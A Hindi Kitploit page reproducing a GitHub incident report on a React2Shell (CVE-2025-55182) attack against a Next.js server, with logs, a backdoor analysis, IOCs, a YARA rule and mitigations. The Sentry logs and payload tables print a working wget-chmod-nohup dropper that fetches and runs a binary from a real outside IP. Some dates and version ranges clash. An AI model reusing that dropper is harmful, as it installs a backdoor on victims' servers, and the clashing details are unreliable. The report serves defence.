Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Attack-Analysis — CVE-2025-55182 (React2Shell) का वास्तविक दुनिया का हमला विश्लेषण - React Server Components RCE भेद्यता | Kitploit
उपकरण/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
समझौता संकेतक (IOC) प्रबंधनभेद्यता विश्लेषणफोरेंसिकवेब सुरक्षामालवेयर विश्लेषणखतरा खुफियालर्निंग और शिक्षाघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

CVE-2025-55182 (React2Shell) का वास्तविक दुनिया का हमला विश्लेषण - React Server Components RCE भेद्यता

रिपॉजिटरी देखें
69 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 हमला विश्लेषण: React Server Components RCE

प्रोडक्शन Next.js एप्लिकेशन पर वास्तविक दुनिया के हमले का विश्लेषण

📋 विषय-सूची

  • कार्यकारी सारांश
  • भेद्यता अवलोकन
  • हमले की समयरेखा
  • तकनीकी विश्लेषण
  • मैलवेयर विश्लेषण
  • समझौता संकेतक (IOCs)
  • शमन और प्रतिक्रिया
  • सीखे गए सबक
  • संदर्भ

कार्यकारी सारांश

5 दिसंबर, 2025 को, हमारे प्रोडक्शन Next.js एप्लिकेशन को हमलावरों द्वारा निशाना बनाया गया, जिन्होंने CVE-2025-55182 (React2Shell) का शोषण किया, जो React Server Components में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है। हमले ने हमारे सर्वर पर Linux बैकडोर ट्रोजन डाउनलोड और निष्पादित करने का प्रयास किया।

विशेषतामान
CVE IDCVE-2025-55182
CVSS स्कोर9.8 (गंभीर)
हमले की तारीख5 दिसंबर, 2025
हमले का परिणाम✅ अवरुद्ध (पैच के बाद)
मैलवेयर प्रकारLinux बैकडोर ट्रोजन
प्रभावित स्टैकNext.js + React Server Components

भेद्यता अवलोकन

CVE-2025-55182 क्या है?

CVE-2025-55182, जिसे "React2Shell" के नाम से भी जाना जाता है, एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है जो निम्नलिखित में React Server Components (RSC) को प्रभावित करती है:

  • React: संस्करण 19.0.0 - 19.2.1
  • Next.js: संस्करण 15.x और 16.x (पैच से पहले)

मूल कारण

यह भेद्यता React के Flight Server में renderToReadableStream() फ़ंक्शन में मौजूद है। विशेष रूप से तैयार किए गए RSC पेलोड को संसाधित करते समय, सर्वर कुछ इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है, जिससे मनमाना कोड निष्पादन होता है।

हमला वेक्टर

root@kitploit:~
Attacker → Malicious RSC Payload → Flight Server → eval() → RCE

हमलावर एक दुर्भावनापूर्ण सीरियलाइज़्ड पेलोड के साथ एक तैयार POST अनुरोध भेजता है, जो सर्वर पर डी-सीरियलाइज़ और निष्पादित हो जाता है।


हमले की समयरेखा

चरण 1: प्रारंभिक शोषण प्रयास (पैच-पूर्व)

टाइमस्टैम्प (UTC)घटना
Dec 5, 06:20पहला हमला Sentry के माध्यम से पता चला
Dec 5, 06:20पेलोड शेल कमांड निष्पादित करने का प्रयास करता है
Dec 5, 06:20हमला आंशिक रूप से सफल (पैच-पूर्व)

Sentry त्रुटि लॉग (पैच-पूर्व):

root@kitploit:~
Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

चरण 2: पैच तैनाती

टाइमस्टैम्पकार्रवाई
Dec 4, 14:13Next.js 16.0.7 में अपग्रेड किया गया
Dec 4, 14:13पैच किया गया संस्करण तैनात किया गया (v1.0.0-beta-4)

चरण 3: पैच-पश्चात हमला अवरुद्ध

टाइमस्टैम्प (UTC)घटना
Dec 5, 08:48हमले का प्रयास पता चला
Dec 5, 08:48पेलोड निष्पादन अवरुद्ध
Dec 5, 08:48त्रुटि: syntax error: unexpected ";"

Sentry त्रुटि लॉग (पैच-पश्चात):

root@kitploit:~
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

पैच ने दुर्भावनापूर्ण कमांड को निष्पादित होने से सफलतापूर्वक रोक दिया।


तकनीकी विश्लेषण

हमले के अनुरोध का विवरण

विशेषतामान
लक्ष्य URLhttps://[REDACTED]/

पेलोड विश्लेषण

हमलावर ने निम्नलिखित कमांड श्रृंखला निष्पादित करने का प्रयास किया:

root@kitploit:~
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

विवरण:

सर्वर वातावरण

घटकसंस्करण
ओएसAlpine Linux 3.23.0
रनटाइमNode.js v20.19.6
फ्रेमवर्कNext.js 16.0.7 (पैच किया गया)

मैलवेयर विश्लेषण

फ़ाइल जानकारी

VirusTotal परिणाम

पहचान दर: 13/72 (18%)

VirusTotal लिंक: विश्लेषण देखें

बाइनरी विश्लेषण

ELF हेडर:

root@kitploit:~
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

पहचानी गई क्षमताएँ:

निकाले गए स्ट्रिंग्स (प्रासंगिक):

root@kitploit:~
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

ट्रिगर हुए IDS नियम

गंभीरतानियमस्रोत
LOWET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
LOWET DNS Query for .cc TLDProofpoint ET Open

मैलवेयर वर्गीकरण

प्रकार: Linux बैकडोर ट्रोजन

क्षमताएँ:

  • रिमोट शेल एक्सेस
  • कमांड एंड कंट्रोल (C2) संचार
  • फ़ाइल अपलोड/डाउनलोड
  • एन्क्रिप्टेड संचार
  • SOCKS5 के माध्यम से ट्रैफ़िक टनलिंग
  • स्थायित्व तंत्र

समझौता संकेतक (IOCs)

नेटवर्क IOCs

फ़ाइल IOCs

व्यवहारिक IOCs

YARA नियम

root@kitploit:~
rule CVE_2025_55182_Backdoor {
    meta:
        description = "Detects backdoor distributed via CVE-2025-55182"
        author = "Security Researcher"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}

शमन और प्रतिक्रिया

तुरंत की गई कार्रवाइयाँ

दुरुपयोग रिपोर्ट

5 दिसंबर, 2025 को Vultr (C2 सर्वर का होस्टिंग प्रदाता) को एक दुरुपयोग रिपोर्ट प्रस्तुत की गई, जिसमें शामिल थे:

  • दुर्भावनापूर्ण IP पता और URL
  • मैलवेयर का SHA256 हैश
  • VirusTotal विश्लेषण लिंक
  • हमले के वेक्टर का विवरण (CVE-2025-55182)

पैच किए गए संस्करण

पैकेजअसुरक्षितपैच किया गया
Next.js< 15.3.3, < 16.0.5≥ 15.3.3, ≥ 16.0.5
React19.0.0 - 19.1.0≥ 19.2.1 (जून 2025+)

अनुशंसित शमन उपाय

1. तुरंत अपग्रेड करें:

root@kitploit:~
# For Next.js 16.x
npm install [email protected] [email protected] [email protected]

# For Next.js 15.x
npm install [email protected] [email protected] [email protected]

2. दुर्भावनापूर्ण IP ब्लॉक करें:

root@kitploit:~
# iptables
sudo iptables -A INPUT -s 45.76.155.14 -j DROP
sudo iptables -A OUTPUT -d 45.76.155.14 -j DROP

# UFW
sudo ufw deny from 45.76.155.14
sudo ufw deny to 45.76.155.14

3. IOCs के लिए निगरानी करें:

root@kitploit:~
# Check for suspicious files
find /tmp -type f -executable 2>/dev/null

# Check for suspicious processes
ps aux | grep -E "(vim|/tmp/)"

# Check network connections
netstat -an | grep "45.76.155.14"

4. सभी गोपनीय जानकारी घुमाएँ:

  • डेटाबेस क्रेडेंशियल
  • JWT सीक्रेट
  • API कुंजियाँ
  • सत्र सीक्रेट

सीखे गए सबक

क्या अच्छा रहा

  1. Sentry निगरानी ने हमले को तुरंत पकड़ लिया
  2. त्वरित पैच तैनाती CVE प्रकटीकरण के घंटों के भीतर
  3. Docker कंटेनरीकरण ने विस्फोट त्रिज्या सीमित कर दी
  4. पैच-पश्चात सुरक्षा ने बाद के हमलों को सफलतापूर्वक अवरुद्ध किया

क्या सुधारा जा सकता था

  1. तेज़ पैचिंग - CVE प्रकटीकरण और पैच के बीच का समय कम करें
  2. WAF नियम - RSC शोषण प्रयासों का पता लगाने के लिए नियम जोड़ें
  3. ईग्रेस फ़िल्टरिंग - अज्ञात IP से बाहरी कनेक्शन ब्लॉक करें
  4. स्वचालित अलर्ट - संदिग्ध शेल कमांड के लिए अलर्ट सेट करें

सुरक्षा अनुशंसाएँ


संदर्भ

आधिकारिक सलाहकार सूचनाएँ

  • Next.js सुरक्षा सलाहकार
  • React सुरक्षा अपडेट
  • CVE-2025-55182 विवरण

विश्लेषण संसाधन

  • VirusTotal विश्लेषण
  • MalwareBazaar

उपयोग किए गए उपकरण

  • Sentry - त्रुटि निगरानी
  • VirusTotal - मैलवेयर विश्लेषण
  • Docker - कंटेनरीकरण

अस्वीकरण

यह लेख केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रकाशित किया गया है। इस रिपॉजिटरी में मैलवेयर बाइनरी शामिल नहीं है। सुरक्षा शोधकर्ता प्रदान किए गए SHA256 हैश का उपयोग करके VirusTotal के माध्यम से नमूना प्राप्त कर सकते हैं।


लेखक

प्रकाशित: 5 दिसंबर, 2025

संपर्क: [आपकी संपर्क जानकारी या GitHub प्रोफ़ाइल]


लाइसेंस

यह विश्लेषण CC BY 4.0 के अंतर्गत जारी किया गया है। आप उचित श्रेय के साथ इस सामग्री को साझा और अनुकूलित करने के लिए स्वतंत्र हैं।


परिवर्तन लॉग

दिनांकसंस्करणपरिवर्तन
2025-12-051.0प्रारंभिक प्रकाशन
टूल डाउनलोड करें
विधि
POST
User-AgentPython Requests 2.31
उत्पत्तिस्वचालित हमला स्क्रिप्ट
चरणकमांडउद्देश्य
1wget http://45.76.155.14/vim -O /tmp/vimमैलवेयर डाउनलोड करें
2chmod +x /tmp/vimनिष्पादन योग्य बनाएं
3nohup /tmp/vim > /dev/null 2>&1 &पृष्ठभूमि में चलाएं, लॉगआउट के बाद बने रहें
4rm -f /tmp/vimसबूत हटाएं
कंटेनर
Docker
विशेषतामान
फ़ाइल का नामvim (वैध टूल के रूप में छिपा हुआ)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
फ़ाइल प्रकारELF 64-bit LSB executable, x86-64
भाषाGo (संकलित बाइनरी)
फ़ाइल आकार~4.7 MB
विक्रेतापहचान नाम
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292
क्षमतासबूत
HTTP/HTTPS क्लाइंटnet/http, *http.Client
TLS एन्क्रिप्शनcrypto/tls, crypto/aes
SOCKS5 प्रॉक्सीsocks, socks5
DNS रिज़ॉल्यूशनnet/dns/dnsmessage
मजबूत क्रिप्टोchacha20poly1305, Ed25519
प्रकारमानविवरण
IP पता45.76.155.14मैलवेयर वितरण सर्वर
URLhttp://45.76.155.14/vimमैलवेयर डाउनलोड URL
होस्टिंगVultr VPSक्लाउड प्रदाता
TLD.ccC2 डोमेन .cc TLD का उपयोग करता है
प्रकारमान
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[यदि आवश्यक हो तो गणना करें]
MD5[यदि आवश्यक हो तो गणना करें]
फ़ाइल का नामvim (छिपा हुआ)
फ़ाइल प्रकारELF 64-bit x86-64
फ़ाइल आकार~4.7 MB
संकेतकविवरण
wget to external IPगैर-मानक URL से डाउनलोड करता है
Files in /tmp/अस्थायी निर्देशिका में संदिग्ध निष्पादन योग्य फ़ाइल
nohup + background executionस्थायित्व प्रयास
Immediate file deletionसबूत सफाई
Python Requests User-Agentस्वचालित हमला उपकरण
कार्रवाईस्थितिविवरण
✅ Next.js अपग्रेड करेंपूर्ण16.0.4 → 16.0.7
✅ React अपग्रेड करेंपूर्ण19.1.0 → 19.2.1 (पैच किया गया)
✅ एप्लिकेशन पुनः तैनात करेंपूर्णDocker पुनर्निर्माण
✅ मैलवेयर का विश्लेषण करेंपूर्णVirusTotal सबमिशन
✅ होस्टिंग को रिपोर्ट करेंपूर्णVultr दुरुपयोग रिपोर्ट भेजी गई
⏳ क्रेडेंशियल घुमाएँलंबितडेटाबेस, JWT, API कुंजियाँ
श्रेणीअनुशंसा
निगरानीवास्तविक समय त्रुटि निगरानी लागू करें (Sentry, आदि)
अपडेटसभी निर्भरताओं के लिए सुरक्षा सलाहकार सूचनाओं की सदस्यता लें
नेटवर्कईग्रेस फ़िल्टरिंग लागू करें, अनावश्यक आउटबाउंड को ब्लॉक करें
कंटेनरगैर-रूट के रूप में चलाएं, केवल-पठनीय फ़ाइल सिस्टम का उपयोग करें
सीक्रेटक्रेडेंशियल नियमित रूप से घुमाएं, सीक्रेट मैनेजर का उपयोग करें